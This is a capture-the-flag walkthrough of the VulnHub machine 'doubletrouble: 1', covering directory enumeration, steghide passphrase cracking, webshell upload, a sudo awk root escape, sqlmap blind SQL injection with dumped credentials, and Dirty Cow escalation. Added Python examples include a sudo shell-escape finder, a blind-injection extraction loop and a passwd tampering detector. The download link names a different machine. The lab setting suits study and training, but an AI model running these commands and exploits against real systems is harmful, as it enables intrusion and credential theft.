- English name: doubletrouble: 1
- Chinese name: Double troubles: 1
- Published date: September 11, 2021
- Difficulty: Easy
- Description: About the VM: tested and exported from VirtualBox. DHCP and nested VT-x/AMD-V are enabled. You can contact me via email for troubleshooting or questions.
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
1. Host discovery (192.168.199.107)
[screenshot: host discovery]
2. Port scanning: ports 22 (SSH) and 80 (HTTP) are open
[screenshot: port scan]
3. Visit the web page
4. Search for vulnerabilities in web components
[screenshot: web component vulnerabilities]
5. Enumerate web directories with dirb
┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.199.107/uploads/
==> DIRECTORY: http://192.168.199.107/backups/
==> DIRECTORY: http://192.168.199.107/secret/
...
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5
6. Discover a secret file, doubletrouble.jpg
[screenshot: clue]
7. Try to extract the data embedded in the image with steghide (it asks for a passphrase, so nothing comes out without one)
steghide info doubletrouble.jpg
[screenshot: extracting data from the image]
8. Use Stegseek to crack the Steghide passphrase[1]
Stegseek is currently the fastest Steghide cracker available; it tests millions of passphrases per second.
Notably, it can run through the whole of rockyou.txt in about two seconds,
and rockyou.txt, as is well known, is a large dictionary with more than 14 million passwords.
┌──(root㉿kali)-[/home/ailx10/002]
└─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt
The passphrase comes out in a second: 92camaro
9. Extract the embedded data again, now with the passphrase, to obtain an email address and a password
┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out
[email protected]
otis666
[screenshot: web administrator credentials]
10. Log in to the web admin panel and add a user, ailx10
[screenshot: user ailx10 added]
11. Switch to the new account, create a project, and upload a webshell
[screenshot: uploading the webshell]
12. Reverse shell
[screenshot: reverse shell]
13. Check sudo rights (sudo -l): awk may be run as root with NOPASSWD
[screenshot: escalating to root]
14. Escalate to root through awk, and find a second target machine inside: it really is double trouble
sudo awk 'BEGIN {system("/bin/sh")}'
[screenshot: the second OVA in root's home]
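The awk entry above is one instance of a general pattern: any NOPASSWD sudo rule for a binary that can spawn a child process is a root shell. The following is an added example, not code from the original walkthrough, that parses `sudo -l` output and flags such rules. The sample output is constructed (the user name www-data and the apt-get rule are assumptions); the awk one-liner is the one used on this page, and the other escapes are well-known GTFOBins entries.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `sudo -l` output. The user (www-data), the Defaults
# line and the apt-get rule are assumptions; the awk rule is the one found here.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on doubletrouble:
    (ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/apt-get update
"""

# Binaries that spawn a shell when run under sudo, with one known escape each.
# awk is the escape used on this page; the others are standard GTFOBins entries.
SHELL_ESCAPES: Dict[str, str] = {
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile, then type !/bin/sh",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
}

# "(runas) TAG: TAG: command args" as printed by sudo -l
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

Rule = Tuple[str, bool, str]  # (run-as user, NOPASSWD set?, command)


def parse_sudo_l(text: str) -> List[Rule]:
    """Extract the command rules from `sudo -l` output, skipping the Defaults part."""
    rules: List[Rule] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            runas = m.group("runas").split(":")[0].strip()  # "(ALL : ALL)" -> "ALL"
            rules.append((runas, "NOPASSWD" in m.group("tags"), m.group("cmd").strip()))
    return rules


def find_shell_escapes(text: str) -> List[Tuple[str, bool, str]]:
    """Return (command, nopasswd, escape) for every rule that yields a root shell."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("ALL", "root"):
            continue  # only rules that run as root matter here
        if cmd == "ALL":
            findings.append((cmd, nopasswd, "sudo /bin/sh"))
            continue
        parts = cmd.split()
        if len(parts) > 1 and parts[1] != "*":
            continue  # arguments pinned in sudoers: the escapes below need free arguments
        binary = parts[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append((cmd, nopasswd, SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    for cmd, nopasswd, escape in find_shell_escapes(SAMPLE_SUDO_L):
        print(f"{cmd} (NOPASSWD={nopasswd}): {escape}")
```

A rule that runs as a non-root user, or that pins the arguments (like the apt-get line), is skipped; the check is deliberately conservative so that each finding is directly exploitable.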
15. Transfer the OVA to the attacker machine with nc (compare a sha256sum on both ends afterwards; a raw nc transfer has no integrity check)
Receiver (attacker machine):
nc -lvp 4444 > ailx10_double_trouble.ova
Sender (target):
nc 192.168.199.247 4444 < doubletrouble.ova
[screenshot: downloading the second OVA]
16. Boot the second target machine and repeat the process
[screenshot: the second target machine]
17. A new IP appears on the network: 192.168.199.171
[screenshot: new IP address 192.168.199.171]
18. Port scanning: ports 22 and 80 are open
[screenshot: port scan]
19. Visit the web page
[screenshot: web page]
20. Test the login form with sqlmap: the uname POST parameter is injectable (time-based blind)
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---
[screenshot: SQL injection confirmed]
21. Get the current database name (doubletrouble)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db
[screenshot: database name]
22. Get the table names (users)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables
[screenshot: table name]
23. Get the column names (username, password)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns
[screenshot: column names]
24. Dump the contents of the users table
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1 |
| clapton | ZubZub99 |
+----------+----------+
[screenshot: dumped rows]
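What sqlmap automated in steps 20 to 24 is character-by-character inference through an injected condition. The following is an added example, not code from the original walkthrough, that reproduces the mechanism against a constructed SQLite stand-in for the target database: the vulnerable string-built login query beside its parameterised fix, and a blind extraction loop that recovers clapton's password through the login oracle. The rows are the ones sqlmap dumped; the shape of the login query in index.php is an assumption, and the oracle here is boolean (login succeeds or not) rather than the SLEEP-based timing sqlmap used, because SQLite has no SLEEP().

```python
import sqlite3
import string
from typing import Callable


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the target's MySQL database (same table, columns and rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("montreux", "GfsZxc1"), ("clapton", "ZubZub99")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, uname: str, psw: str) -> bool:
    """The injectable pattern (assumed for index.php): input spliced into the SQL text."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username='{uname}' "
           f"AND password='{psw}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn: sqlite3.Connection, uname: str, psw: str) -> bool:
    """Parameterised query: the input can only ever be compared as a value."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (uname, psw)).fetchone()[0] > 0


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 32) -> str:
    """Recover the single-value result of `subquery` one character at a time.

    `oracle(uname_payload)` returns True when the login succeeded. Each guess
    closes the username string, ORs in a substr() comparison and comments out
    the password clause, so a successful login means the guessed character is right.
    """
    charset = string.ascii_letters + string.digits + "_@."
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = f"x' OR substr(({subquery}),{pos},1)='{ch}' -- "
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the value
    return recovered


if __name__ == "__main__":
    db = build_db()
    leak = "SELECT password FROM users WHERE username='clapton'"
    print("vulnerable:", blind_extract(lambda p: login_vulnerable(db, p, "123456"), leak))
    print("fixed:", repr(blind_extract(lambda p: login_fixed(db, p, "123456"), leak)))
```

Against the parameterised version the same payloads are just an unknown username and the loop returns an empty string after the first position; that is the whole difference between the two login functions.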
25. Log in over SSH as clapton with the dumped password and read the user flag
[screenshot: SSH login and user flag]
26. Gather system information and look for a privilege escalation vector
[screenshot: system information]
[screenshot: privilege escalation PoC]
27. Compiling exploit 45010 fails because a file is missing, so fall back to Dirty Cow[2]
Dirty Cow (CVE-2016-5195) affects Linux kernels older than the following fixed builds:
- CentOS 7 / RHEL 7: 3.10.0-327.36.3.el7
- CentOS 6 / RHEL 6: 2.6.32-642.6.2.el6
- Ubuntu 16.10: 4.8.0-26.28
- Ubuntu 16.04: 4.4.0-45.66
- Ubuntu 14.04: 3.13.0-100.147
- Debian 8: 3.16.36-1+deb8u2
- Debian 7: 3.2.82-1
The bug is a race condition in the kernel's get_user_pages() handling of copy-on-write: by racing a forced write against madvise(MADV_DONTNEED), an unprivileged process can get its write applied to the private, read-only mapping of a file instead of to a private copy, and so change the kernel's cached content of a file it can only read.
The firefart PoC uses this to overwrite the root entry at the start of /etc/passwd with a new UID 0 user (firefart) whose password hash is stored directly in that line, after backing the original up to /tmp/passwd.bak.
clapton@doubletrouble:~$ ls
45010.c dirty.c user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c dirty dirty.c user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash
mmap: 7f49735fb000
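The run above leaves two artefacts a responder can check for: a UID 0 entry that is not root (with its hash inside /etc/passwd rather than /etc/shadow) and the backup the PoC writes to /tmp/passwd.bak. The following is an added example, not code from the original walkthrough or from the firefart repository, that audits a passwd file for those signs and diffs it against the backup. Both passwd excerpts are constructed: the "before" file is an ordinary Debian-style layout (an assumption), and the "after" file has its root line replaced by the "Complete line" printed above.

```python
from typing import Dict, List, Tuple

PasswdEntry = Dict[str, str]

# Constructed /etc/passwd excerpts. PASSWD_BEFORE is what /tmp/passwd.bak would hold
# (the daemon/www-data/clapton lines are assumed); PASSWD_AFTER is the same file
# after the PoC overwrote the root entry with the firefart line shown on the page.
PASSWD_BEFORE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
clapton:x:1000:1000:clapton,,,:/home/clapton:/bin/bash
"""

PASSWD_AFTER = """\
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
clapton:x:1000:1000:clapton,,,:/home/clapton:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Split passwd(5) lines into named fields, ignoring blanks, comments and malformed lines."""
    entries: List[PasswdEntry] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        parts = raw.split(":")
        if len(parts) != 7:
            continue
        entries.append(dict(zip(FIELDS, parts)))
    return entries


def audit_passwd(text: str) -> List[str]:
    """Flag the traces a Dirty Cow / passwd-rewrite escalation leaves behind."""
    findings: List[str] = []
    entries = parse_passwd(text)
    if "root" not in {e["name"] for e in entries}:
        findings.append("no 'root' entry: the root line has been overwritten or removed")
    for e in entries:
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: UID 0 account that is not root")
        pw = e["passwd"]
        if pw == "":
            findings.append(f"{e['name']}: empty password field (no password required)")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # A real hash here is honoured by su/login and bypasses /etc/shadow entirely.
            findings.append(f"{e['name']}: password hash stored in /etc/passwd, bypassing /etc/shadow")
    return findings


def diff_against_backup(backup: str, current: str) -> Tuple[List[str], List[str]]:
    """Lines only in the backup (removed) and only in the live file (added), in file order."""
    old = set(backup.splitlines())
    new = set(current.splitlines())
    removed = [line for line in backup.splitlines() if line not in new]
    added = [line for line in current.splitlines() if line not in old]
    return removed, added


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_AFTER):
        print("finding:", finding)
    removed, added = diff_against_backup(PASSWD_BEFORE, PASSWD_AFTER)
    print("removed:", removed)
    print("added:", added)
```

On a live system the same two functions would be fed the contents of /etc/passwd and /tmp/passwd.bak; an empty findings list and an empty diff is the clean state.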
28. Use the new UID 0 account to become root and read the root flag
[screenshot: root flag]
At this point, the experiment is complete~
References
[1] Stegseek: https://github.com/RickdeJager/stegseek/releases
[2] Dirty Cow: https://github.com/firefart/dirtycow
Edited on 2022-08-21 21:08